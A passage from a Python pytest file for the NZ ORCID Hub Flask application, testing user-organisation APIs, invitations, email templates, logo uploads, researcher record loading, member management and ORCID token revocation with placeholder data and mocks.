with request_ctx(
f"/hub/api/v0.1/users/{user.id}/orgs/",
data=json.dumps({
"id": org.id,
"name": org.name,
"is_admin": True,
"is_tech_contact": True
}),
method="POST",
content_type="application/json") as ctx:
login_user(user, remember=True)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 201
assert User.get(id=user.id).roles & Role.ADMIN
organisation = Organisation.get(name="THE ORGANISATION")
# User becomes the technical contact of the organisation.
assert organisation.tech_contact == user
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 200
assert UserOrg.select().where(UserOrg.user == user, UserOrg.org == org,
UserOrg.is_admin).exists()
with request_ctx(f"/hub/api/v0.1/users/{user.id}/orgs/{org.id}", method="DELETE") as ctx:
# Delete user and organisation association
login_user(user, remember=True)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 204
data = json.loads(resp.data)
user = User.get(id=user.id)
assert data["status"] == "DELETED"
assert user.organisation_id is None
assert not (user.roles & Role.ADMIN)
assert not UserOrg.select().where(UserOrg.user == user, UserOrg.org == org).exists()
def test_user_orgs(request_ctx):
"""Test add an organisation to the user."""
org = Organisation.create(
name="THE ORGANISATION",
tuakiri_name="THE ORGANISATION",
confirmed=False,
orcid_client_id="CLIENT ID",
orcid_secret="Client Secret",
city="CITY",
country="COUNTRY",
disambiguated_id="ID",
disambiguation_source="SOURCE",
is_email_sent=True)
user = User.create(
email="<EMAIL>",
name="TEST USER",
roles=Role.SUPERUSER,
orcid="123",
confirmed=True,
organisation=org)
UserOrg.create(user=user, org=org, is_admin=True)
with request_ctx(f"/hub/api/v0.1/users/{user.id}/orgs/") as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
with request_ctx(f"/hub/api/v0.1/users/{user.id}/orgs/{org.id}") as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
with request_ctx("/hub/api/v0.1/users/1234/orgs/") as ctx:
# failure test case, user not found
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 404
def test_api_credentials(request_ctx):
"""Test manage API credentials.."""
org = Organisation.create(
name="THE ORGANISATION",
tuakiri_name="THE ORGANISATION",
confirmed=False,
orcid_client_id="CLIENT ID",
orcid_secret="Client Secret",
city="CITY",
country="COUNTRY",
disambiguated_id="ID",
disambiguation_source="SOURCE",
is_email_sent=True)
user = User.create(
email="<EMAIL>",
name="TEST USER",
roles=Role.TECHNICAL,
orcid="123",
confirmed=True,
organisation=org)
UserOrg.create(user=user, org=org, is_admin=True)
Client.create(
name="Test_client",
user=user,
org=org,
client_id="requestd_client_id",
client_secret="xyz",
is_confidential="public",
grant_type="client_credentials",
response_type="xyz")
with request_ctx(
method="POST",
data={
"name": "<NAME>",
"homepage_url": "http://test.at.test",
"description": "TEST APPLICATION 123",
"register": "Register",
"reset": "xyz"
}):
login_user(user, remember=True)
resp = views.api_credentials()
assert "<EMAIL>" in resp
with request_ctx(method="POST", data={"name": "TEST APP", "delete": "xyz"}):
login_user(user, remember=True)
resp = views.api_credentials()
assert resp.status_code == 302
assert "application" in resp.location
def test_page_not_found(request_ctx):
"""Test handle nonexistin pages."""
with request_ctx("/this/does/not/exist") as ctx:
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 404
assert b"Sorry, that page doesn't exist." in resp.data
with request_ctx("/this/does/not/exist/?url=/something/else") as ctx:
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == "/something/else"
def test_favicon(request_ctx):
"""Test favicon."""
with request_ctx("/favicon.ico") as ctx:
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 200
assert resp.mimetype == "image/vnd.microsoft.icon"
def send_mail_mock(*argvs, **kwargs):
"""Mock email invitation."""
app.logger.info(f"***\nActually email invitation was mocked, so no email sent!!!!!")
return True
@patch("orcid_hub.utils.send_email", side_effect=send_mail_mock)
def test_action_invite(patch, request_ctx):
"""Test handle nonexistin pages."""
org = Organisation.create(
name="THE ORGANISATION",
tuakiri_name="THE ORGANISATION",
confirmed=False,
orcid_client_id="CLIENT ID",
orcid_secret="Client Secret",
city="CITY",
country="COUNTRY",
disambiguated_id="ID",
disambiguation_source="SOURCE",
is_email_sent=True)
user = User.create(
email="<EMAIL>",
name="TEST USER",
roles=Role.TECHNICAL,
orcid="123",
confirmed=True,
organisation=org)
UserOrg.create(user=user, org=org, is_admin=True)
org_info = OrgInfo.create(
name="Test_client",
tuakiri_name="xyz",
title="mr",
first_name="xyz",
last_name="xyz",
role="lead",
email="<EMAIL>",
phone="121",
is_public=True,
country="NZ",
city="Auckland",
disambiguated_id="123",
disambiguation_source="ringgold")
with request_ctx():
login_user(user, remember=True)
views.OrgInfoAdmin.action_invite(OrgInfo, ids=[org_info.id])
# New organisation is created from OrgInfo and user is added with Admin role
org2 = Organisation.get(name="Test_client")
assert user.is_admin_of(org2)
assert Role.ADMIN in user.roles
def test_shorturl(request_ctx):
"""Test short url."""
url = "http://localhost/xsdsdsfdds"
with request_ctx():
rv = views.shorturl(url)
assert "http://" in rv
def test_activate_all(request_ctx):
"""Test batch registraion of users."""
org = Organisation.create(
name="THE ORGANISATION",
tuakiri_name="THE ORGANISATION",
confirmed=False,
orcid_client_id="CLIENT ID",
orcid_secret="Client Secret",
city="CITY",
country="COUNTRY",
disambiguated_id="ID",
disambiguation_source="SOURCE",
is_email_sent=True)
user = User.create(
email="<EMAIL>",
name="TEST USER",
roles=Role.TECHNICAL,
orcid=123,
organisation_id=1,
confirmed=True,
organisation=org)
UserOrg.create(user=user, org=org, is_admin=True)
task1 = Task.create(
org=org,
completed_at="12/12/12",
filename="xyz.txt",
created_by=user,
updated_by=user,
task_type=0)
task2 = Task.create(
org=org,
completed_at="12/12/12",
filename="xyz.txt",
created_by=user,
updated_by=user,
task_type=1)
with request_ctx("/activate_all", method="POST") as ctxx:
login_user(user, remember=True)
request.args = ImmutableMultiDict([('url', 'http://localhost/affiliation_record_activate_for_batch')])
request.form = ImmutableMultiDict([('task_id', task1.id)])
rv = ctxx.app.full_dispatch_request()
assert rv.status_code == 302
assert rv.location.startswith("http://localhost/affiliation_record_activate_for_batch")
with request_ctx("/activate_all", method="POST") as ctxx:
login_user(user, remember=True)
request.args = ImmutableMultiDict([('url', 'http://localhost/funding_record_activate_for_batch')])
request.form = ImmutableMultiDict([('task_id', task2.id)])
rv = ctxx.app.full_dispatch_request()
assert rv.status_code == 302
assert rv.location.startswith("http://localhost/funding_record_activate_for_batch")
def test_logo(request_ctx):
"""Test manage organisation 'logo'."""
org = Organisation.create(
name="THE ORGANISATION",
tuakiri_name="THE ORGANISATION",
confirmed=False,
orcid_client_id="CLIENT ID",
orcid_secret="Client Secret",
city="CITY",
country="COUNTRY",
disambiguated_id="ID",
disambiguation_source="SOURCE",
is_email_sent=True)
user = User.create(
email="<EMAIL>",
name="TEST USER",
roles=Role.TECHNICAL,
orcid="123",
confirmed=True,
organisation=org)
UserOrg.create(user=user, org=org, is_admin=True)
with request_ctx("/settings/logo", method="POST") as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"<!DOCTYPE html>" in rv.data, "Expected HTML content"
with request_ctx("/logo/token_123") as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 302
assert rv.location.endswith("images/banner-small.png")
@patch("orcid_hub.utils.send_email", side_effect=send_mail_mock)
def test_manage_email_template(patch, request_ctx):
"""Test manage organisation invitation email template."""
org = Organisation.create(
name="THE ORGANISATION",
tuakiri_name="THE ORGANISATION",
confirmed=False,
orcid_client_id="CLIENT ID",
orcid_secret="Client Secret",
city="CITY",
country="COUNTRY",
disambiguated_id="ID",
disambiguation_source="SOURCE",
is_email_sent=True)
user = User.create(
email="<EMAIL>",
name="TEST USER",
roles=Role.TECHNICAL,
orcid="123",
confirmed=True,
organisation=org)
UserOrg.create(user=user, org=org, is_admin=True)
with request_ctx(
"/settings/email_template",
method="POST",
data={
"name": "TEST APP",
"homepage_url": "http://test.at.test",
"description": "TEST APPLICATION 123",
"email_template": "enable",
"save": "Save"
}) as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"Are you sure?" in rv.data
with request_ctx(
"/settings/email_template",
method="POST",
data={
"name": "<NAME>",
"homepage_url": "http://test.at.test",
"description": "TEST APPLICATION 123",
"email_template": "enable {MESSAGE} {INCLUDED_URL}",
"save": "Save"
}) as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"<!DOCTYPE html>" in rv.data, "Expected HTML content"
org = Organisation.get(id=org.id)
assert org.email_template == "enable {MESSAGE} {INCLUDED_URL}"
with request_ctx(
"/settings/email_template",
method="POST",
data={
"name": "<NAME>",
"email_template_enabled": "true",
"email_address": "<EMAIL>",
"send": "Save"
}) as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"<!DOCTYPE html>" in rv.data, "Expected HTML content"
def send_mail_mock(*argvs, **kwargs):
"""Mock email invitation."""
logger.info(f"***\nActually email invitation was mocked, so no email sent!!!!!")
return True
def test_invite_user(request_ctx):
"""Test invite a researcher to join the hub."""
org = Organisation.get(name="TEST0")
admin = User.get(email="<EMAIL>")
user = User.create(
email="<EMAIL>",
name="<NAME>",
confirmed=True,
organisation=org)
UserOrg.create(user=user, org=org, affiliations=Affiliation.EMP)
UserInvitation.create(
invitee=user,
inviter=admin,
org=org,
email="<EMAIL>",
token="<PASSWORD>")
with request_ctx("/invite/user") as ctx:
login_user(admin, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"<!DOCTYPE html>" in rv.data, "Expected HTML content"
assert org.name.encode() in rv.data
with request_ctx(
"/invite/user",
method="POST",
data={
"name": "<NAME>",
"is_employee": "false",
"email_address": "<EMAIL>",
"resend": "enable",
"is_student": "true",
"first_name": "test",
"last_name": "test",
"city": "test"
}) as ctx, patch("orcid_hub.views.send_user_invitation.queue") as queue_send_user_invitation:
login_user(admin, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"<!DOCTYPE html>" in rv.data, "Expected HTML content"
assert b"<EMAIL>" in rv.data
queue_send_user_invitation.assert_called_once()
with patch("orcid_hub.orcid_client.MemberAPI") as m, patch(
"orcid_hub.orcid_client.SourceClientId"), request_ctx(
"/invite/user",
method="POST",
data={
"name": "<NAME>",
"is_employee": "false",
"email_address": "<EMAIL>",
"resend": "enable",
"is_student": "true",
"first_name": "test",
"last_name": "test",
"city": "test"}) as ctx:
login_user(admin, remember=True)
OrcidToken.create(access_token="<PASSWORD>", user=user, org=org, scope="/read-limited,/activities/update",
expires_in='121')
api_mock = m.return_value
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"<!DOCTYPE html>" in rv.data, "Expected HTML content"
assert b"<EMAIL>" in rv.data
api_mock.create_or_update_affiliation.assert_called_once()
def test_email_template(app, request_ctx):
"""Test email maintenance."""
org = Organisation.get(name="TEST0")
user = User.get(email="<EMAIL>")
with request_ctx(
"/settings/email_template",
method="POST",
data={
"email_template_enabled": "y",
"prefill": "Pre-fill",
}) as ctx:
login_user(user)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"<!DOCTYPE html>" in rv.data
org.reload()
assert not org.email_template_enabled
with patch("orcid_hub.utils.send_email") as send_email, request_ctx(
"/settings/email_template",
method="POST",
data={
"email_template_enabled": "y",
"email_template": "TEST TEMPLATE {EMAIL}",
"send": "Send",
}) as ctx:
login_user(user)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
org.reload()
assert not org.email_template_enabled
send_email.assert_called_once_with(
"email/test.html",
base="TEST TEMPLATE {EMAIL}",
cc_email=("TEST ORG #0 ADMIN", "<EMAIL>"),
logo=None,
org_name="TEST0",
recipient=("TEST ORG #0 ADMIN", "<EMAIL>"),
reply_to=("TEST ORG #0 ADMIN", "<EMAIL>"),
sender=("TEST ORG #0 ADMIN", "<EMAIL>"),
subject="TEST EMAIL")
with request_ctx(
"/settings/email_template",
method="POST",
data={
"email_template_enabled": "y",
"email_template": "TEST TEMPLATE TO SAVE {MESSAGE} {INCLUDED_URL}",
"save": "Save",
}) as ctx:
login_user(user)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
org.reload()
assert org.email_template_enabled
assert "TEST TEMPLATE TO SAVE {MESSAGE} {INCLUDED_URL}" in org.email_template
with patch("emails.message.Message") as msg_cls, request_ctx(
"/settings/email_template",
method="POST",
data={
"email_template_enabled": "y",
"email_template": app.config["DEFAULT_EMAIL_TEMPLATE"],
"send": "Send",
}) as ctx:
login_user(user)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
org.reload()
assert org.email_template_enabled
msg_cls.assert_called_once()
_, kwargs = msg_cls.call_args
assert kwargs["subject"] == "TEST EMAIL"
assert kwargs["mail_from"] == (
"NZ ORCID HUB",
"<EMAIL>",
)
assert "<!DOCTYPE html>\n<html>\n" in kwargs["html"]
assert "TEST0" in kwargs["text"]
org.logo = File.create(
filename="LOGO.png",
data=b"000000000000000000000",
mimetype="image/png",
token="TOKEN000")
org.save()
user.reload()
with patch("orcid_hub.utils.send_email") as send_email, request_ctx(
"/settings/email_template",
method="POST",
data={
"email_template_enabled": "y",
"email_template": "TEST TEMPLATE {EMAIL}",
"send": "Send",
}) as ctx:
login_user(user)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
org.reload()
assert org.email_template_enabled
send_email.assert_called_once_with(
"email/test.html",
base="TEST TEMPLATE {EMAIL}",
cc_email=("TEST ORG #0 ADMIN", "<EMAIL>"),
logo=f"http://{ctx.request.host}/logo/TOKEN000",
org_name="TEST0",
recipient=("TEST ORG #0 ADMIN", "<EMAIL>"),
reply_to=("TEST ORG #0 ADMIN", "<EMAIL>"),
sender=("TEST ORG #0 ADMIN", "<EMAIL>"),
subject="TEST EMAIL")
def test_logo_file(request_ctx):
"""Test logo support."""
org = Organisation.get(name="TEST0")
user = User.get(email="<EMAIL>")
with request_ctx(
"/settings/logo",
method="POST",
data={
"upload": "Upload",
"logo_file": (
BytesIO(b"FAKE IMAGE"),
"logo.png",
),
}) as ctx:
login_user(user)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 200
org.reload()
assert org.logo is not None
assert org.logo.filename == "logo.png"
with request_ctx(
"/settings/logo",
method="POST",
data={
"reset": "Reset",
}) as ctx:
login_user(user)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 200
org.reload()
assert org.logo is None
@patch("orcid_hub.utils.send_email", side_effect=send_mail_mock)
def test_invite_organisation(send_email, request_ctx):
"""Test invite an organisation to register."""
org = Organisation.get(name="TEST0")
root = User.get(email="<EMAIL>")
user = User.create(
email="<EMAIL>", name="TEST USER", confirmed=True, organisation=org)
UserOrg.create(user=user, org=org, is_admin=True)
with request_ctx(
"/invite/organisation",
method="POST",
data={
"org_name": "THE ORGANISATION",
"org_email": "<EMAIL>",
"tech_contact": "True",
"via_orcid": "True",
"first_name": "xyz",
"last_name": "xyz",
"city": "xyz"
}) as ctx:
login_user(root, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"<!DOCTYPE html>" in rv.data, "Expected HTML content"
assert b"<EMAIL>" in rv.data
send_email.assert_called_once()
with request_ctx(
"/invite/organisation",
method="POST",
data={
"org_name": "ORG NAME",
"org_email": "<EMAIL>",
"tech_contact": "True",
"via_orcid": "True",
"first_name": "xyz",
"last_name": "xyz",
"city": "xyz"
}) as ctx:
send_email.reset_mock()
login_user(root, remember=True)
org = Organisation.get(id=1)
org.name = "ORG NAME"
org.confirmed = True
org.save()
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"<!DOCTYPE html>" in rv.data, "Expected HTML content"
assert b"<EMAIL>" in rv.data
send_email.assert_called_once()
def core_mock(self=None, source_file=None, schema_files=None, source_data=None, schema_data=None, extensions=None,
strict_rule_validation=False,
fix_ruby_style_regex=False, allow_assertions=False, ):
"""Mock validation api call."""
return None
def validate(self=None, raise_exception=True):
"""Mock validation api call."""
return False
@patch("pykwalify.core.Core.validate", side_effect=validate)
@patch("pykwalify.core.Core.__init__", side_effect=core_mock)
def test_load_researcher_funding(patch, patch2, request_ctx):
"""Test preload organisation data."""
org = Organisation.create(
name="THE ORGANISATION",
tuakiri_name="THE ORGANISATION",
confirmed=False,
orcid_client_id="CLIENT ID",
orcid_secret="Client Secret",
city="CITY",
country="COUNTRY",
disambiguated_id="ID",
disambiguation_source="SOURCE",
is_email_sent=True)
user = User.create(
email="<EMAIL>",
name="TEST USER",
roles=Role.ADMIN,
orcid="123",
confirmed=True,
organisation=org)
UserOrg.create(user=user, org=org, is_admin=True)
with request_ctx(
"/load/researcher/funding",
method="POST",
data={
"file_": (
BytesIO(
b'[{"invitees": [{"identifier":"00001", "email": "<EMAIL>",'
b'"first-name": "Alice", "last-name": "<NAME>", "ORCID-iD": null, "put-code":null}],'
b'"title": { "title": { "value": "1ral"}},"short-description": "Mi","type": "CONTRACT",'
b'"contributors": {"contributor": [{"contributor-attributes": {"contributor-role": '
b'"co_lead"},"credit-name": {"value": "firentini"}}]}'
b', "external-ids": {"external-id": [{"external-id-value": '
b'"GNS170661","external-id-type": "grant_number"}]}}]'),
"logo.json",),
"email": user.email
}) as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 302
# Funding file successfully loaded.
assert "task_id" in rv.location
assert "funding" in rv.location
@patch("pykwalify.core.Core.validate", side_effect=validate)
@patch("pykwalify.core.Core.__init__", side_effect=core_mock)
def test_load_researcher_work(patch, patch2, request_ctx):
"""Test preload work data."""
user = User.get(email="<EMAIL>")
user.roles = Role.ADMIN
user.save()
with request_ctx(
"/load/researcher/work",
method="POST",
data={
"file_": (
BytesIO(
b'[{"invitees": [{"identifier":"00001", "email": "<EMAIL>",'
b'"first-name": "Alice", "last-name": "<NAME>", "ORCID-iD": null, "put-code":null}],'
b'"title": { "title": { "value": "1ral"}}, "citation": {"citation-type": '
b'"FORMATTED_UNSPECIFIED", "citation-value": "This is citation value"}, "type": "BOOK_CHR",'
b'"contributors": {"contributor": [{"contributor-attributes": {"contributor-role": '
b'"AUTHOR", "contributor-sequence" : "1"},"credit-name": {"value": "firentini"}}]}'
b', "external-ids": {"external-id": [{"external-id-value": '
b'"GNS170661","external-id-type": "grant_number"}]}}]'),
"logo.json",),
"email": user.email
}) as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 302
# Work file successfully loaded.
assert "task_id" in rv.location
assert "work" in rv.location
@patch("pykwalify.core.Core.validate", side_effect=validate)
@patch("pykwalify.core.Core.__init__", side_effect=core_mock)
def test_load_researcher_peer_review(patch, patch2, request_ctx):
"""Test preload peer review data."""
user = User.get(email="<EMAIL>")
user.roles = Role.ADMIN
user.save()
with request_ctx(
"/load/researcher/peer_review",
method="POST",
data={
"file_": (
BytesIO(
b'[{"invitees": [{"identifier": "00001", "email": "<EMAIL>", '
b'"first-name": "Alice", "last-name": "<NAME>", "ORCID-iD": null, "put-code": null}]'
b', "reviewer-role": "REVIEWER", "review-identifiers": { "external-id": [{ '
b'"external-id-type": "source-work-id", "external-id-value": "1212221", "external-id-url": '
b'{"value": "https://localsystem.org/1234"}, "external-id-relationship": "SELF"}]}, '
b'"review-type": "REVIEW", "review-group-id": "issn:90122", "subject-container-name": { '
b'"value": "Journal title"}, "subject-type": "JOURNAL_ARTICLE", "subject-name": { '
b'"title": {"value": "Name of the paper reviewed"}},"subject-url": { '
b'"value": "https://subject-alt-url.com"}, "convening-organization": { "name": '
b'"The University of Auckland", "address": { "city": "Auckland", "region": "Auckland",'
b' "country": "NZ" } }}]'),
"logo.json",),
"email": user.email
}) as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 302
# peer-review file successfully loaded.
assert "task_id" in rv.location
assert "peer" in rv.location
def test_load_researcher_affiliations(request_ctx):
"""Test preload organisation data."""
org = Organisation.create(
name="THE ORGANISATION",
tuakiri_name="THE ORGANISATION",
confirmed=False,
orcid_client_id="CLIENT ID",
orcid_secret="Client Secret",
city="CITY",
country="COUNTRY",
disambiguated_id="ID",
disambiguation_source="SOURCE",
is_email_sent=True)
user = User.create(
email="<EMAIL>",
name="TEST USER",
roles=Role.ADMIN,
orcid="123",
confirmed=True,
organisation=org)
UserOrg.create(user=user, org=org, is_admin=True)
form = FileUploadForm()
form.file_.name = "conftest.py"
with request_ctx("/load/researcher", method="POST", data={"file_": "{'filename': 'xyz.json'}",
"email": user.email, form: form}) as ctxx:
login_user(user, remember=True)
rv = ctxx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"<!DOCTYPE html>" in rv.data, "Expected HTML content"
assert user.email.encode() in rv.data
def test_edit_record(request_ctx):
"""Test create a new or edit an existing profile section record."""
admin = User.get(email="<EMAIL>")
user = User.get(email="<EMAIL>")
admin.organisation.orcid_client_id = "ABC123"
admin.organisation.save()
if not user.orcid:
user.orcid = "XXXX-XXXX-XXXX-0001"
user.save()
fake_response = make_response
fake_response.status = 201
fake_response.headers = {'Location': '12344/xyz/12399'}
OrcidToken.create(user=user, org=user.organisation, access_token="ABC123", scope="/read-limited,/activities/update")
with patch.object(
orcid_client.MemberAPIV20Api,
"view_employment",
MagicMock(return_value=make_fake_response('{"test": "TEST1234567890"}'))
) as view_employment, request_ctx(f"/section/{user.id}/EMP/1212/edit") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert admin.email.encode() in resp.data
assert admin.name.encode() in resp.data
view_employment.assert_called_once_with("XXXX-XXXX-XXXX-0001", 1212)
with patch.object(
orcid_client.MemberAPIV20Api,
"view_education",
MagicMock(return_value=make_fake_response('{"test": "TEST1234567890"}'))
) as view_education, request_ctx(f"/section/{user.id}/EDU/1234/edit") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert admin.email.encode() in resp.data
assert admin.name.encode() in resp.data
view_education.assert_called_once_with("XXXX-XXXX-XXXX-0001", 1234)
with patch.object(
orcid_client.MemberAPIV20Api, "create_education",
MagicMock(return_value=fake_response)), request_ctx(
f"/section/{user.id}/EDU/new",
method="POST",
data={
"city": "Auckland",
"country": "NZ",
"org_name": "TEST",
}) as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == f"/section/{user.id}/EDU/list"
affiliation_record = UserOrgAffiliation.get(user=user)
# checking if the UserOrgAffiliation record is updated with put_code supplied from fake response
assert 12399 == affiliation_record.put_code
def test_delete_employment(request_ctx, app):
"""Test delete an employment record."""
admin = User.get(email="<EMAIL>")
user = User.get(email="<EMAIL>")
with request_ctx(f"/section/{user.id}/EMP/1212/delete", method="POST") as ctx:
login_user(user)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location.startswith("/?next=")
with request_ctx(f"/section/99999999/EMP/1212/delete", method="POST") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == "/admin/viewmembers/"
with request_ctx(f"/section/{user.id}/EMP/1212/delete", method="POST") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == f"/section/{user.id}/EMP/list"
admin.organisation.orcid_client_id = "ABC123"
admin.organisation.save()
with request_ctx(f"/section/{user.id}/EMP/1212/delete", method="POST") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == f"/section/{user.id}/EMP/list"
if not user.orcid:
user.orcid = "XXXX-XXXX-XXXX-0001"
user.save()
token = OrcidToken.create(
user=user, org=user.organisation, access_token="ABC123", scope="/read-limited")
with request_ctx(f"/section/{user.id}/EMP/1212/delete", method="POST") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == f"/section/{user.id}/EMP/list"
token.scope = "/read-limited,/activities/update"
token.save()
with patch.object(
orcid_client.MemberAPIV20Api,
"delete_employment",
MagicMock(
return_value='{"test": "TEST1234567890"}')) as delete_employment, request_ctx(
f"/section/{user.id}/EMP/12345/delete", method="POST") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
delete_employment.assert_called_once_with("XXXX-XXXX-XXXX-0001", 12345)
with patch.object(
orcid_client.MemberAPIV20Api,
"delete_education",
MagicMock(return_value='{"test": "TEST1234567890"}')) as delete_education, request_ctx(
f"/section/{user.id}/EDU/54321/delete", method="POST") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
delete_education.assert_called_once_with("XXXX-XXXX-XXXX-0001", 54321)
def test_viewmembers(request_ctx):
"""Test affilated researcher view."""
non_admin = User.get(email="<EMAIL>")
with request_ctx("/admin/viewmembers") as ctx:
login_user(non_admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
admin = User.get(email="<EMAIL>")
with request_ctx("/admin/viewmembers") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 200
assert b"<EMAIL>" in resp.data
with request_ctx("/admin/viewmembers/?flt1_0=2018-05-01+to+2018-05-31&flt2_1=2018-05-01+to+2018-05-31") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 200
assert b"<EMAIL>" not in resp.data
with request_ctx(f"/admin/viewmembers/edit/?id={non_admin.id}") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 200
assert non_admin.email.encode() in resp.data
assert non_admin.name.encode() in resp.data
with request_ctx(f"/admin/viewmembers/edit/?id=9999999999") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 404
user2 = User.get(email="<EMAIL>")
with request_ctx(f"/admin/viewmembers/edit/?id={user2.id}") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 403
def test_viewmembers_delete(request_ctx):
"""Test affilated researcher deletion via the view."""
admin0 = User.get(email="<EMAIL>")
admin1 = User.get(email="<EMAIL>")
researcher0 = User.get(email="<EMAIL>")
researcher1 = User.get(email="<EMAIL>")
with request_ctx(
"/admin/viewmembers/delete/",
method="POST",
data={
"id": str(researcher1.id),
"url": "/admin/viewmembers/",
}) as ctx: # noqa: F405
login_user(admin0)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 403
with request_ctx(
"/admin/viewmembers/delete/",
method="POST",
data={
"id": str(researcher0.id),
"url": "/admin/viewmembers/",
}) as ctx, patch(
"orcid_hub.views.AppModelView.on_model_delete",
create=True,
side_effect=Exception("FAILURED")), patch(
"orcid_hub.views.AppModelView.handle_view_exception",
create=True,
return_value=False): # noqa: F405
login_user(admin0)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == "/admin/viewmembers/"
assert User.select().where(User.id == researcher0.id).count() == 1
with request_ctx(
"/admin/viewmembers/delete/",
method="POST",
data={
"id": str(researcher0.id),
"url": "/admin/viewmembers/",
}) as ctx: # noqa: F405
login_user(admin0)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
with pytest.raises(User.DoesNotExist):
User.get(id=researcher0.id)
UserOrg.create(org=admin0.organisation, user=researcher1)
OrcidToken.create(org=admin0.organisation, user=researcher1, access_token="ABC<PASSWORD>")
with request_ctx(
"/admin/viewmembers/delete/",
method="POST",
data={
"id": str(researcher1.id),
"url": "/admin/viewmembers/",
}) as ctx, patch("orcid_hub.views.requests.post") as mockpost: # noqa: F405
org = researcher1.organisation
mockpost.return_value = MagicMock(status_code=400)
login_user(admin1)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert User.select().where(User.id == researcher1.id).count() == 1
assert UserOrg.select().where(UserOrg.user == researcher1).count() == 2
assert OrcidToken.select().where(OrcidToken.org == org, OrcidToken.user == researcher1).count() == 1
mockpost.side_effect = Exception("FAILURE")
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert User.select().where(User.id == researcher1.id).count() == 1
assert UserOrg.select().where(UserOrg.user == researcher1).count() == 2
assert OrcidToken.select().where(OrcidToken.org == org, OrcidToken.user == researcher1).count() == 1
mockpost.reset_mock(side_effect=True)
mockpost.return_value = MagicMock(status_code=200)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert User.select().where(User.id == researcher1.id).count() == 1
assert UserOrg.select().where(UserOrg.user == researcher1).count() == 1
args, kwargs = mockpost.call_args
assert args[0] == ctx.app.config["ORCID_BASE_URL"] + "oauth/revoke"
data = kwargs["data"]
assert data["client_id"] == "ABC123"
assert data["client_secret"] == "SECRET-12345"
assert data["token"].startswith("TOKEN-1")
assert OrcidToken.select().where(OrcidToken.org == org, OrcidToken.user == researcher1).count() == 0
def test_reset_all(request_ctx):
"""Test reset batch process."""
org = Organisation.create(
name="THE ORGANISATION",
tuakiri_name="THE ORGANISATION",
confirmed=False,
orcid_client_id="CLIENT ID",
orcid_secret="Client Secret",
city="CITY",
country="COUNTRY",
disambiguated_id="ID",
disambiguation_source="SOURCE",
is_email_sent=True)
user = User.create(
email="<EMAIL>",
name="TEST USER",
roles=Role.TECHNICAL,
orcid=123,
organisation_id=1,
confirmed=True,
organisation=org)
UserOrg.create(user=user, org=org, is_admin=True)
task1 = Task.create(
id=1,
org=org,
completed_at="12/12/12",
filename="xyz.txt",
created_by=user,
updated_by=user,
task_type=0)
AffiliationRecord.create(
is_active=True,
task=task1,
external_id="Test",
first_name="Test",
last_name="Test",
email="<EMAIL>",
orcid="123112311231",
organisation="asdasd",
affiliation_type="staff",
role="Test",
department="Test",
city="Test",
state="Test",
country="Test",
disambiguated_id="Test",
disambiguation_source="Test")
